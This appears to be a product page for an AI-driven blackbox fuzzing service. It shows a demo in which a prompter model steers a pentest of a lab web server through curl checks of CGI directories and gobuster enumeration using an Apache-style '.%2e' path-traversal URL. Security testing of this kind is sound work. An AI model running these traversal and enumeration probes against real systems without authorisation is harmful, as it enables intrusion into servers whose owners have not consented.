Taking CVEs off your plate
one byte at a time
Taking CVEs off your plate
one byte at a time
Taking CVEs off your plate
one byte at a time
Join our early access list.
Stay updated with the latest trends in startup technology and innovations.
Join our early access list.
Stay updated with the latest trends
in startup technology and innovations.
Blackbox Fuzzing Automation
Blackbox Fuzzing Automation
How does it work?
How does it work?
Bearing foundation from Microsoft’s “AutoGen: Enabling Next-Gen LLM Applications via Multi-Agent Conversation,” we automate Blackbox Fuzzing by splitting the task to the prompter model and the responder model.
The prompter is trained to predict the next prompt given the previous response, and the responder is trained to predict the best response for a given prompt. Actual engagement begins when the two models start a conversation. To ensure that the prompter does not repeat instructing the responder to abuse an attack vector that has already been attempted, we have developed an innovative proprietary solution that efficiently teaches information on attempted attack vectors to the prompter.
I am doing a penetration testing engagement on a vulnerable endpoint.
Request:
```
GET / HTTP/1.1
Host: 192.168.238.188
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
```
Response:
```
HTTP/1.1 200 OK
Date: Tue, 15 Apr 2025 11:48:33 GMT
Last-Modified: Mon, 27 Jun 2022 20:54:23 GMT
ETag: "2327-5e2741fe8fdc0"
Accept-Ranges: bytes
Content-Length: 8999
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML>
<!--
Paradigm Shift by HTML5 UP
html5up.net | @ajlkn
Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)
-->
<html>
<head>
<title>Paradigm Shifts</title>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
<meta name="description" content="" />
<meta name="keywords" content="" />
<link rel="stylesheet" href="assets/css/main.css" />
</head>
<body class="is-preload">
<!-- Wrapper -->
<div id="wrapper">
<!-- Intro -->
<section class="intro">
<header>
<h1>Paradigm Shifts</h1>
<p>Changing the stigmas around mental health</p>
<ul class="actions">
<li><a href="#first" class="arrow scrolly"><span class="label">Next</span></a></li>
</ul>
</header>
<div class="content">
<span class="image fill" data-position="center"><img src="images/pic01.jpg" alt="" /></span>
</div>
</section>
<!-- Section -->
<section id="first">
<header>
<h2>We start with YOU</h2>
</header>
<div class="content">
<p><strong>Self-introspection</strong> is the first of many steps we can help you get started with. Taking that time to yourself to truly engage with your thoughts and emotions will help unlock a personal understanding to allow for the acceptance of who you are and in what areas you wish to improve. It starts with you.</p>
<span class="image main"><img src="images/pic02.jpg" alt="" /></span>
</div>
</section>
<!-- Section -->
<section>
<header>
<h2>Identifying behaviors and habits</h2>
</header>
<div class="content">
<p><strong>Behaviors and habits</strong> can often feel like they are outside of our control. Some of these habits may not be good for our mental health. Ask yourself these things</p>
<ul class="feature-icons">
<li class="icon solid fa-laptop">How much screen time do I have in a day?</li>
<li class="icon solid fa-bolt">Am I getting enough sleep?</li>
<li class="icon solid fa-signal">Do I allow myself to disconnect with technology and connect with myself and the environment I'm in?</li>
<li class="icon solid fa-cog">Do I take time to actively think?</li>
<li class="icon solid fa-map-marker-alt">Am I in the place I want to be?</li>
<li class="icon solid fa-code">What is something I can do to spark joy?</li>
</ul>
<p>Asking ourselves these questions can help identify common behaviors and habits that we may want to change. Are we getting too much screen time and not engaging with others? Rest and relaxation are critical to feel energized and ready to take on life's challenges. Maybe we can think of a hobby or goal that will spark joy and identify the right amount of activity toward that end.</p>
</div>
</section>
<!-- Section -->
<section>
<header>
<h2>We can make a PLAN</h2>
</header>
<div class="content">
<p><strong>Once we engage</strong> with ourselves, we can make a plan toward what fulfills us.</p>
<!-- Section -->
<section>
<header>
<h3>Linking it Together</h3>
<p>Plans aren't achievable all at once. Let's work together to figure out the right steps to take toward improving your life. </p>
</header>
<div class="content">
<div class="gallery">
<a href="images/gallery/fulls/01.jpg" class="landscape"><img src="images/gallery/thumbs/01.jpg" alt="" /></a>
<a href="images/gallery/fulls/02.jpg"><img src="images/gallery/thumbs/02.jpg" alt="" /></a>
<a href="images/gallery/fulls/03.jpg"><img src="images/gallery/thumbs/03.jpg" alt="" /></a>
<a href="images/gallery/fulls/04.jpg" class="landscape"><img src="images/gallery/thumbs/04.jpg" alt="" /></a>
</div>
</div>
</section>
<!-- Section -->
<section>
<header>
<h3>Accomplishing Goals</h3>
<p>From the time we wake up, we can find small goals to achieve that will lead to our longer term goals. Sometimes, our goals can be as simple as taking an afternoon walk.</p>
</header>
<div class="content">
<div class="gallery">
<a href="images/gallery/fulls/05.jpg" class="landscape"><img src="images/gallery/thumbs/05.jpg" alt="" /></a>
<a href="images/gallery/fulls/06.jpg"><img src="images/gallery/thumbs/06.jpg" alt="" /></a>
<a href="images/gallery/fulls/07.jpg"><img src="images/gallery/thumbs/07.jpg" alt="" /></a>
</div>
</div>
</section>
<!-- Section -->
<section>
<header>
<h3>The Future</h3>
<p>No one knows what the future may hold for us, but this shouldn't stop us from striving for a better future. Even when we are down and not feeling up to the enormity of life, let's take a breath, know we are in a safe place, and trust that WE CAN. We can help you in our journey and be a support for when you are feeling low. Together we rise!</p>
</header>
<div class="content">
<div class="gallery">
<a href="images/gallery/fulls/08.jpg" class="portrait"><img src="images/gallery/thumbs/08.jpg" alt="" /></a>
<a href="images/gallery/fulls/09.jpg" class="portrait"><img src="images/gallery/thumbs/09.jpg" alt="" /></a>
<a href="images/gallery/fulls/10.jpg" class="landscape"><img src="images/gallery/thumbs/10.jpg" alt="" /></a>
</div>
</div>
</section>
</div>
</section>
<!-- Section -->
<section>
<header>
<h2>Are you ready?</h2>
</header>
<div class="content">
<p><strong>Contact us</strong> if you feel we can help you through the difficulties in life. We are a non-profit organization and strive to improve as many lives as possible. We KNOW you are valuable and of worth. If you doubt us, let us prove it.</p>
<ul class="actions">
<li><a href="#" class="button primary large">Get Started</a></li>
<li><a href="#" class="button large">Learn More</a></li>
</ul>
</div>
</section>
<!-- Section -->
<section>
<header>
<h2>Get in touch</h2>
</header>
<div class="content">
<p><strong>YOU</strong> are worth it! To contact us, fill out the form below. One of our team members will reach out to you.</p>
<form>
<div class="fields">
<div class="field half">
<input type="text" name="name" id="name" placeholder="Name" />
</div>
<div class="field half">
<input type="email" name="email" id="email" placeholder="Email" />
</div>
<div class="field">
<textarea name="message" id="message" placeholder="Message" rows="7"></textarea>
</div>
</div>
<ul class="actions">
<li><input type="submit" value="Send Message" class="button primary" /></li>
</ul>
</form>
</div>
<footer>
<ul class="items">
<li>
<h3>Email</h3>
<a href="#">information@paradigmshifts.com</a>
</li>
<li>
<h3>Phone</h3>
<a href="#">(888) 692-9355</a>
</li>
<li>
<h3>Address</h3>
<span>750 First St. NE, Washington, DC 20002-4242</span>
</li>
<li>
<h3>Elsewhere</h3>
<ul class="icons">
<li><a href="#" class="icon brands fa-twitter"><span class="label">Twitter</span></a></li>
<li><a href="#" class="icon brands fa-facebook-f"><span class="label">Facebook</span></a></li>
<li><a href="#" class="icon brands fa-instagram"><span class="label">Instagram</span></a></li>
<li><a href="#" class="icon brands fa-linkedin-in"><span class="label">LinkedIn</span></a></li>
<li><a href="#" class="icon brands fa-github"><span class="label">GitHub</span></a></li>
<li><a href="#" class="icon brands fa-codepen"><span class="label">Codepen</span></a></li>
</ul>
</li>
</ul>
</footer>
</section>
<!-- Copyright -->
<div class="copyright">© Untitled. All rights reserved. Design: <a href="https://html5up.net">HTML5 UP</a>.</div>
</div>
<!-- Scripts -->
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/jquery.scrolly.min.js"></script>
<script src="assets/js/browser.min.js"></script>
<script src="assets/js/breakpoints.min.js"></script>
<script src="assets/js/util.js"></script>
<script src="assets/js/main.js"></script>
</body>
</html>
```
The server seems to have CGI capabilities. Verify which CGI scripts or aliases are enabled and potentially accessible from the internet.
I am doing a penetration testing engagement on a vulnerable endpoint.
Request:
```
GET / HTTP/1.1
Host: 192.168.238.188
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
```
Response:
```
HTTP/1.1 200 OK
Date: Tue, 15 Apr 2025 11:48:33 GMT
Last-Modified: Mon, 27 Jun 2022 20:54:23 GMT
ETag: "2327-5e2741fe8fdc0"
Accept-Ranges: bytes
Content-Length: 8999
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML>
<!--
Paradigm Shift by HTML5 UP
html5up.net | @ajlkn
Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)
-->
<html>
<head>
<title>Paradigm Shifts</title>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
<meta name="description" content="" />
<meta name="keywords" content="" />
<link rel="stylesheet" href="assets/css/main.css" />
</head>
<body class="is-preload">
<!-- Wrapper -->
<div id="wrapper">
<!-- Intro -->
<section class="intro">
<header>
<h1>Paradigm Shifts</h1>
<p>Changing the stigmas around mental health</p>
<ul class="actions">
<li><a href="#first" class="arrow scrolly"><span class="label">Next</span></a></li>
</ul>
</header>
<div class="content">
<span class="image fill" data-position="center"><img src="images/pic01.jpg" alt="" /></span>
</div>
</section>
<!-- Section -->
<section id="first">
<header>
<h2>We start with YOU</h2>
</header>
<div class="content">
<p><strong>Self-introspection</strong> is the first of many steps we can help you get started with. Taking that time to yourself to truly engage with your thoughts and emotions will help unlock a personal understanding to allow for the acceptance of who you are and in what areas you wish to improve. It starts with you.</p>
<span class="image main"><img src="images/pic02.jpg" alt="" /></span>
</div>
</section>
<!-- Section -->
<section>
<header>
<h2>Identifying behaviors and habits</h2>
</header>
<div class="content">
<p><strong>Behaviors and habits</strong> can often feel like they are outside of our control. Some of these habits may not be good for our mental health. Ask yourself these things</p>
<ul class="feature-icons">
<li class="icon solid fa-laptop">How much screen time do I have in a day?</li>
<li class="icon solid fa-bolt">Am I getting enough sleep?</li>
<li class="icon solid fa-signal">Do I allow myself to disconnect with technology and connect with myself and the environment I'm in?</li>
<li class="icon solid fa-cog">Do I take time to actively think?</li>
<li class="icon solid fa-map-marker-alt">Am I in the place I want to be?</li>
<li class="icon solid fa-code">What is something I can do to spark joy?</li>
</ul>
<p>Asking ourselves these questions can help identify common behaviors and habits that we may want to change. Are we getting too much screen time and not engaging with others? Rest and relaxation are critical to feel energized and ready to take on life's challenges. Maybe we can think of a hobby or goal that will spark joy and identify the right amount of activity toward that end.</p>
</div>
</section>
<!-- Section -->
<section>
<header>
<h2>We can make a PLAN</h2>
</header>
<div class="content">
<p><strong>Once we engage</strong> with ourselves, we can make a plan toward what fulfills us.</p>
<!-- Section -->
<section>
<header>
<h3>Linking it Together</h3>
<p>Plans aren't achievable all at once. Let's work together to figure out the right steps to take toward improving your life. </p>
</header>
<div class="content">
<div class="gallery">
<a href="images/gallery/fulls/01.jpg" class="landscape"><img src="images/gallery/thumbs/01.jpg" alt="" /></a>
<a href="images/gallery/fulls/02.jpg"><img src="images/gallery/thumbs/02.jpg" alt="" /></a>
<a href="images/gallery/fulls/03.jpg"><img src="images/gallery/thumbs/03.jpg" alt="" /></a>
<a href="images/gallery/fulls/04.jpg" class="landscape"><img src="images/gallery/thumbs/04.jpg" alt="" /></a>
</div>
</div>
</section>
<!-- Section -->
<section>
<header>
<h3>Accomplishing Goals</h3>
<p>From the time we wake up, we can find small goals to achieve that will lead to our longer term goals. Sometimes, our goals can be as simple as taking an afternoon walk.</p>
</header>
<div class="content">
<div class="gallery">
<a href="images/gallery/fulls/05.jpg" class="landscape"><img src="images/gallery/thumbs/05.jpg" alt="" /></a>
<a href="images/gallery/fulls/06.jpg"><img src="images/gallery/thumbs/06.jpg" alt="" /></a>
<a href="images/gallery/fulls/07.jpg"><img src="images/gallery/thumbs/07.jpg" alt="" /></a>
</div>
</div>
</section>
<!-- Section -->
<section>
<header>
<h3>The Future</h3>
<p>No one knows what the future may hold for us, but this shouldn't stop us from striving for a better future. Even when we are down and not feeling up to the enormity of life, let's take a breath, know we are in a safe place, and trust that WE CAN. We can help you in our journey and be a support for when you are feeling low. Together we rise!</p>
</header>
<div class="content">
<div class="gallery">
<a href="images/gallery/fulls/08.jpg" class="portrait"><img src="images/gallery/thumbs/08.jpg" alt="" /></a>
<a href="images/gallery/fulls/09.jpg" class="portrait"><img src="images/gallery/thumbs/09.jpg" alt="" /></a>
<a href="images/gallery/fulls/10.jpg" class="landscape"><img src="images/gallery/thumbs/10.jpg" alt="" /></a>
</div>
</div>
</section>
</div>
</section>
<!-- Section -->
<section>
<header>
<h2>Are you ready?</h2>
</header>
<div class="content">
<p><strong>Contact us</strong> if you feel we can help you through the difficulties in life. We are a non-profit organization and strive to improve as many lives as possible. We KNOW you are valuable and of worth. If you doubt us, let us prove it.</p>
<ul class="actions">
<li><a href="#" class="button primary large">Get Started</a></li>
<li><a href="#" class="button large">Learn More</a></li>
</ul>
</div>
</section>
<!-- Section -->
<section>
<header>
<h2>Get in touch</h2>
</header>
<div class="content">
<p><strong>YOU</strong> are worth it! To contact us, fill out the form below. One of our team members will reach out to you.</p>
<form>
<div class="fields">
<div class="field half">
<input type="text" name="name" id="name" placeholder="Name" />
</div>
<div class="field half">
<input type="email" name="email" id="email" placeholder="Email" />
</div>
<div class="field">
<textarea name="message" id="message" placeholder="Message" rows="7"></textarea>
</div>
</div>
<ul class="actions">
<li><input type="submit" value="Send Message" class="button primary" /></li>
</ul>
</form>
</div>
<footer>
<ul class="items">
<li>
<h3>Email</h3>
<a href="#">information@paradigmshifts.com</a>
</li>
<li>
<h3>Phone</h3>
<a href="#">(888) 692-9355</a>
</li>
<li>
<h3>Address</h3>
<span>750 First St. NE, Washington, DC 20002-4242</span>
</li>
<li>
<h3>Elsewhere</h3>
<ul class="icons">
<li><a href="#" class="icon brands fa-twitter"><span class="label">Twitter</span></a></li>
<li><a href="#" class="icon brands fa-facebook-f"><span class="label">Facebook</span></a></li>
<li><a href="#" class="icon brands fa-instagram"><span class="label">Instagram</span></a></li>
<li><a href="#" class="icon brands fa-linkedin-in"><span class="label">LinkedIn</span></a></li>
<li><a href="#" class="icon brands fa-github"><span class="label">GitHub</span></a></li>
<li><a href="#" class="icon brands fa-codepen"><span class="label">Codepen</span></a></li>
</ul>
</li>
</ul>
</footer>
</section>
<!-- Copyright -->
<div class="copyright">© Untitled. All rights reserved. Design: <a href="https://html5up.net">HTML5 UP</a>.</div>
</div>
<!-- Scripts -->
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/jquery.scrolly.min.js"></script>
<script src="assets/js/browser.min.js"></script>
<script src="assets/js/breakpoints.min.js"></script>
<script src="assets/js/util.js"></script>
<script src="assets/js/main.js"></script>
</body>
</html>
```
The server seems to have CGI capabilities. Verify which CGI scripts or aliases are enabled and potentially accessible from the internet.
Checking for Accessible CGI Directories
```
└─$ curl -s http://192.168.238.188/cgi-bin/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
</body></html>
└─$ curl -s http://192.168.238.188/cgi/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
└─$ curl -s http://192.168.238.188/cgi-sys/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
```
Checking for Accessible CGI Directories
```
└─$ curl -s http://192.168.238.188/cgi-bin/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
</body></html>
└─$ curl -s http://192.168.238.188/cgi/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
└─$ curl -s http://192.168.238.188/cgi-sys/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
```
Could there be a path traversal issue here? If so, systematically test for it.
Could there be a path traversal issue here? If so, systematically test for it.
Using Gobuster to Discover Scripts and Subdirectories
```
└─$ gobuster dir -u http://192.168.238.188/cgi-bin/.%2e/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.238.188/cgi-bin/.%2e/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin (Status: 301) [Size: 250] [--> http://192.168.238.188/cgi-bin/../cgi-bin/]
/icons (Status: 301) [Size: 248] [--> http://192.168.238.188/cgi-bin/../icons/]
/modules (Status: 301) [Size: 250] [--> http://192.168.238.188/cgi-bin/../modules/]
/bin (Status: 301) [Size: 246] [--> http://192.168.238.188/cgi-bin/../bin/]
/manual (Status: 301) [Size: 249] [--> http://192.168.238.188/cgi-bin/../manual/]
/include (Status: 301) [Size: 250] [--> http://192.168.238.188/cgi-bin/../include/]
/conf (Status: 301) [Size: 247] [--> http://192.168.238.188/cgi-bin/../conf/]
/man (Status: 301) [Size: 246] [--> http://192.168.238.188/cgi-bin/../man/]
/logs (Status: 301) [Size: 247] [--> http://192.168.238.188/cgi-bin/../logs/]
/error (Status: 301) [Size: 248] [--> http://192.168.238.188/cgi-bin/../error/]
/htdocs (Status: 301) [Size: 249] [--> http://192.168.238.188/cgi-bin/../htdocs/]
/build (Status: 301) [Size: 248] [--> http://192.168.238.188/cgi-bin/../build/]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
└─$ gobuster dir -u http://192.168.238.188/cgi-bin/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x .sh,.pl,.cgi,.py
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.238.188/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: py,sh,pl,cgi
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 128172 / 438325 (29.24%)[ERROR] Get "http://192.168.238.188/cgi-bin/index97.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 134604 / 438325 (30.71%)[ERROR] Get "http://192.168.238.188/cgi-bin/Lib.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 135536 / 438325 (30.92%)[ERROR] Get "http://192.168.238.188/cgi-bin/threatexplorer.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 146394 / 438325 (33.40%)[ERROR] Get "http://192.168.238.188/cgi-bin/4251.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 149148 / 438325 (34.03%)[ERROR] Get "http://192.168.238.188/cgi-bin/All%20popular%20movies%202006.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 150042 / 438325 (34.23%)[ERROR] Get "http://192.168.238.188/cgi-bin/lesson2.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 154077 / 438325 (35.15%)[ERROR] Get "http://192.168.238.188/cgi-bin/Merchandise.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 154104 / 438325 (35.16%)[ERROR] Get "http://192.168.238.188/cgi-bin/customer_testimonials.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 154187 / 438325 (35.18%)[ERROR] Get "http://192.168.238.188/cgi-bin/spring2006.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 164711 / 438325 (37.58%)[ERROR] Get "http://192.168.238.188/cgi-bin/link_exchange.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 164760 / 438325 (37.59%)[ERROR] Get "http://192.168.238.188/cgi-bin/nips.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 167535 / 438325 (38.22%)[ERROR] Get "http://192.168.238.188/cgi-bin/11876.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 167560 / 438325 (38.23%)[ERROR] Get "http://192.168.238.188/cgi-bin/21965.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 168053 / 438325 (38.34%)[ERROR] Get "http://192.168.238.188/cgi-bin/Formats.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 168544 / 438325 (38.45%)[ERROR] Get "http://192.168.238.188/cgi-bin/index_87": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 168812 / 438325 (38.51%)[ERROR] Get "http://192.168.238.188/cgi-bin/263732.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 172153 / 438325 (39.28%)[ERROR] Get "http://192.168.238.188/cgi-bin/secgeek.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 172476 / 438325 (39.35%)[ERROR] Get "http://192.168.238.188/cgi-bin/corporate_solutions.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 173300 / 438325 (39.54%)[ERROR] Get "http://192.168.238.188/cgi-bin/000137": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 173726 / 438325 (39.63%)[ERROR] Get "http://192.168.238.188/cgi-bin/netcheck.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 177567 / 438325 (40.51%)[ERROR] Get "http://192.168.238.188/cgi-bin/index_sv.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 177923 / 438325 (40.59%)[ERROR] Get "http://192.168.238.188/cgi-bin/0325.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 180697 / 438325 (41.22%)[ERROR] Get "http://192.168.238.188/cgi-bin/nana": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 180871 / 438325 (41.26%)[ERROR] Get "http://192.168.238.188/cgi-bin/5806.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 182609 / 438325 (41.66%)[ERROR] Get "http://192.168.238.188/cgi-bin/5041.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 183624 / 438325 (41.89%)[ERROR] Get "http://192.168.238.188/cgi-bin/idg_intl.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 186365 / 438325 (42.52%)[ERROR] Get "http://192.168.238.188/cgi-bin/sing.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/sing.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 188304 / 438325 (42.96%)[ERROR] Get "http://192.168.238.188/cgi-bin/subrequest.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 188386 / 438325 (42.98%)[ERROR] Get "http://192.168.238.188/cgi-bin/superstars.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 192655 / 438325 (43.95%)[ERROR] Get "http://192.168.238.188/cgi-bin/14971.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 192741 / 438325 (43.97%)[ERROR] Get "http://192.168.238.188/cgi-bin/Principles.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 193541 / 438325 (44.15%)[ERROR] Get "http://192.168.238.188/cgi-bin/Fotos.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 195914 / 438325 (44.70%)[ERROR] Get "http://192.168.238.188/cgi-bin/top_menu3.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 196314 / 438325 (44.79%)[ERROR] Get "http://192.168.238.188/cgi-bin/winter-sports.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 197786 / 438325 (45.12%)[ERROR] Get "http://192.168.238.188/cgi-bin/Posters.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 201436 / 438325 (45.96%)[ERROR] Get "http://192.168.238.188/cgi-bin/msg00231.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 201462 / 438325 (45.96%)[ERROR] Get "http://192.168.238.188/cgi-bin/242873": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 201696 / 438325 (46.02%)[ERROR] Get "http://192.168.238.188/cgi-bin/62300": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 201709 / 438325 (46.02%)[ERROR] Get "http://192.168.238.188/cgi-bin/242920": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 201806 / 438325 (46.04%)[ERROR] Get "http://192.168.238.188/cgi-bin/242924": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 202753 / 438325 (46.26%)[ERROR] Get "http://192.168.238.188/cgi-bin/20011112": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 205654 / 438325 (46.92%)[ERROR] Get "http://192.168.238.188/cgi-bin/8289.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207127 / 438325 (47.25%)[ERROR] Get "http://192.168.238.188/cgi-bin/msg00228": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207770 / 438325 (47.40%)[ERROR] Get "http://192.168.238.188/cgi-bin/23443": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 210757 / 438325 (48.08%)[ERROR] Get "http://192.168.238.188/cgi-bin/level.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 211173 / 438325 (48.18%)[ERROR] Get "http://192.168.238.188/cgi-bin/wto.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 214735 / 438325 (48.99%)[ERROR] Get "http://192.168.238.188/cgi-bin/ShowArticle.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/ShowArticle": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 214930 / 438325 (49.03%)[ERROR] Get "http://192.168.238.188/cgi-bin/downloads24.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 215013 / 438325 (49.05%)[ERROR] Get "http://192.168.238.188/cgi-bin/manifest": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 215653 / 438325 (49.20%)[ERROR] Get "http://192.168.238.188/cgi-bin/rolling_stones.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 215997 / 438325 (49.28%)[ERROR] Get "http://192.168.238.188/cgi-bin/8029.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 217849 / 438325 (49.70%)[ERROR] Get "http://192.168.238.188/cgi-bin/Software_Development.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 218587 / 438325 (49.87%)[ERROR] Get "http://192.168.238.188/cgi-bin/uninstaller.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 221577 / 438325 (50.55%)[ERROR] Get "http://192.168.238.188/cgi-bin/9599.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 221840 / 438325 (50.61%)[ERROR] Get "http://192.168.238.188/cgi-bin/9981.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 260912 / 438325 (59.52%)[ERROR] Get "http://192.168.238.188/cgi-bin/21220": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 261422 / 438325 (59.64%)[ERROR] Get "http://192.168.238.188/cgi-bin/cog.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 261946 / 438325 (59.76%)[ERROR] Get "http://192.168.238.188/cgi-bin/16066.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 266228 / 438325 (60.74%)[ERROR] Get "http://192.168.238.188/cgi-bin/Audience_Development.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 270299 / 438325 (61.67%)[ERROR] Get "http://192.168.238.188/cgi-bin/hidef.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 270343 / 438325 (61.68%)[ERROR] Get "http://192.168.238.188/cgi-bin/zion.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 271301 / 438325 (61.89%)[ERROR] Get "http://192.168.238.188/cgi-bin/submitter": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 273052 / 438325 (62.29%)[ERROR] Get "http://192.168.238.188/cgi-bin/45984.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
